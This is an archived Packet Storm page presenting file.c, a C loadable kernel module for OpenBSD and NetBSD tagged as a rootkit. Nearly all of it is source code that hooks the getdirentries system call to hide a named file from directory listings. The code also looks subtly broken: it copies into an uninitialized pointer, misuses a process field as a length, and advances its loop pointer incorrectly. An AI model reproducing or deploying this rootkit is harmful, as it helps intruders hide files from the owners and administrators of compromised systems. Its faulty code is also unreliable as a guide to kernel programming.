exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

file.c

file.c
Posted Jan 5, 2003
Authored by George Dissios | Site frapes.org

OpenBSD and NetBSD LKM which hides files by patching getdirentries().

tags | tool, rootkit
systems | netbsd, unix, openbsd
SHA-256 | 281adc79edc85e83c7b2c663fcc68dfbea7fdb717f4948665d758518e709e6bf

file.c

Change Mirror Download
/* OpenBSD (should work also on NetBSD) LKM hiding file using getdirentries */
/* systemcall! */
/* 2002 by gr33k gr33k@frapes.org www.frapes.org www.gm.fh-koeln.de/~ai604 */

#define DONT_PERMIT
#include <sys/param.h>
#include <sys/systm.h>
#include <sys/syscall.h>
#include <sys/mount.h>
#include <sys/conf.h>
#include <sys/syscallargs.h>
#include <sys/exec.h>
#include <sys/lkm.h>
#include <sys/file.h>
#include <sys/filedesc.h>
#include <sys/errno.h>
#include <sys/dirent.h>
#include <sys/proc.h>
#include <sys/syslog.h>
#include <sys/malloc.h>

int my_getdirentries __P((struct proc *, void *, register_t *));
MOD_MISC("HideFile");

static int
HideFile_load(struct lkm_table *lkmtp,int cmd)
{
if(cmd==LKM_E_LOAD)
{
sysent[SYS_getdirentries].sy_call=my_getdirentries;
}
return 0;
}

static int
HideFile_unload(struct lkm_table *lkmtp,int cmd)
{
if(cmd==LKM_E_UNLOAD)
{
sysent[SYS_getdirentries].sy_call=sys_getdirentries;
}
return 0;
}

HideFile(lkmtp,cmd,ver)
struct lkm_table *lkmtp;
int cmd;
int ver;
{
DISPATCH(lkmtp,cmd,ver,HideFile_load,HideFile_unload,lkm_nofunc);
}

int
my_getdirentries(p,v,retval)
struct proc *p;
void *v;
register_t *retval;
{
register struct sys_getdirentries_args *uap=v;
unsigned int tmp,n,t;
struct dirent *dirp2,*dirp3;
char hide[]="top-secret"; /* Edit filename */

getdirentries(p,uap);
tmp=p->p_dupfd;
if(tmp>0)
{
copyin(&(uap->buf),dirp2,tmp);
dirp3=dirp2;
t=tmp;
while(t>0)
{
n=dirp3->d_reclen;
t-=n;
if(strcmp((char*)&(dirp3->d_name), (char*)&hide)==0)
{
if(t!=0)
bcopy((char*)dirp3+n,(char*)dirp3,t);
}
tmp-=n;
}
if(dirp3->d_reclen==0)
t=0;
if(t!=0)
dirp3=(struct dirent*)((char*)dirp3+dirp3->d_reclen);
}
p->p_dupfd=tmp;
copyout(dirp2,&(uap->buf),tmp);
return (0);
}
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close